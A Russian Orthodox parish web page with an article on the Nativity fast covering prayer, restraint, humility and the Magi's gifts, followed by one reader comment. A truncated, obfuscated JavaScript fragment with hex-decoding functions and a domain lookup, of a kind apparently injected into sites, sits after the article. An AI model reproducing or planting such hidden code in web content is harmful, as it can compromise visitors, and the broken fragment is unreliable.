О ПОСТЕ НАКАНУНЕ РОЖДЕСТВА ХРИСТОВА.

В православной церкви есть четыре многодневных поста – Великий пост, Петров пост, Успенский пост и Рожественский (Филиппов) пост. Рождественский  пост начинается 28 ноября и заканчивается  6 января. Называется он еще «Филипповым», так как ему предшествует день памяти святого апостола Филиппа. Пост накануне  Рождества Христова —  это подготовка души к светлому празднику – Дню Рождения Спасителя. Если свой день рождения и дни рождения близких нам людей  мы чтим и помним,  то тем паче должно нам  почитать день рождения Того, кто пришел в наш мир ради нашего спасения и  искупил наши грехи Своей Крестной смертью ради того, чтобы мы могли войти вслед за Христом в блаженную вечность. Пост — время борьбы со  страстями  и пороками, более сосредоточенной духовной жизни, творения дел любви и милосердия. Телу предписывается воздержание от скоромной пищи, душе – воздержание от всего суетного, лишнего, неполезного для души, желающей  проявить любовь  к Богу  и ближнему. Важно не превратить это время в  пищевую диету, во внешнее исполнение правил, а постараться углубиться в себя, быть искренним, лучше понять свои отношения с Богом,  обдумать, что мешает, какие страсти и пороки ты хотел бы в себе победить. Если  любишь человека – стараешься его не расстраивать,  но радовать. Так же —  если любишь Бога, нужно  постараться Его не расстраивать, но радовать. Нужно найти своё слабое место, в котором особенно важно навести порядок, это та страсть, которая особенно мешает тебе и близким. Кто – то чрезмерно раздражается,   кто-то унывает, у кого – то нет постоянства в чем – то малом, например в ежедневном чтении молитвенного правила. Пост — время, когда наиболее следует подчинить своё «хочу» слову «надо»,  время лишений и приобретений —  ограничения себя в чём-то  телесном, комфортном, для приобретения  иных ценностей – духовных. А это всегда – труд, всегда – понуждение. Церковь учит не налагать на себя чрезмерных подвигов,  но делать всё по силам и постепенно. Главный принцип, которым следует руководствоваться – любовь. Ограничение в пище – по силам, с рассуждением. Больным людям пост послабляется. Можно посоветоваться со священником о мере поста. Нужно постараться сделать так, чтобы близким твоим не приходилось тебя терпеть,  а чтобы с тобой было радостно и хорошо. Через служение ближним проявляется наша любовь к Богу. Следует научиться никого не осуждать,  не превозноситься перед другими,  что является также проявлением   милосердия. Сам Бог – Спаситель родился в мир простым беззащитным младенцем, ребёнком.  Царь мира – родился в пещерке, где содержался скот.  Его земные родители, Пресвятая Богородица и  старец Иосиф, были лишены мирского величия,  славы, жили просто и убого.   Первыми, кому  было явлено его рождение, были простые пастухи.   Вся жизнь Спасителя – от рождения до смерти – путь смирения и самопожертвования.  Его жизнь – образец того пути, который предлагается всякому человеку, желающему обрести спасение и  войти в блаженную вечность.  Для спасения  души важна молитва, беседа с Богом. Сам  Иисус Христос, будучи Богом и совершенным человеком,  как повествует святое Евангелие, всегда молился своему Отцу, Творцу  Вселенной. Тем паче – нам, немощным и грешным,  следует молиться, просить у Бога  вразумления и помощи в борьбе с нашими недугами, грехами. Церковь учит усерднее молиться в пост, чему помогает  телесное воздержание. Приветствовали рождение  Христа, как мы знаем, также  трое  волхвов –  люди учёные,  желавшие  увидеть Того,  рождение Которого было предсказано Священным Писанием. Они  предприняли для этого тяжёлый и опасный путь,   уверовавши во Христа они, по преданию, приняли за Него мученическую смерть. Родившемуся Христу волхвы принесли в дар золото, смирну и ладан. Для последователей Христа эти дары символизируют:  золото –добрые дела,  смирна  — смирение перед величием Бога, воскурение ладана – наши молитвы. Такие духовные дары мы и призваны стяжать в пост, чтобы принести их в дар младенцу – Христу.

 ( По материалам православных изданий подготовила С.Г.Ворончук, Приход храма Преображения  Господня города Муравленко.)

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "muravlenko.cerkov.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Просмотры: (32)

One Comment

  1. Виктория

    Очень хорошая статья…! Спаси Бог!

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *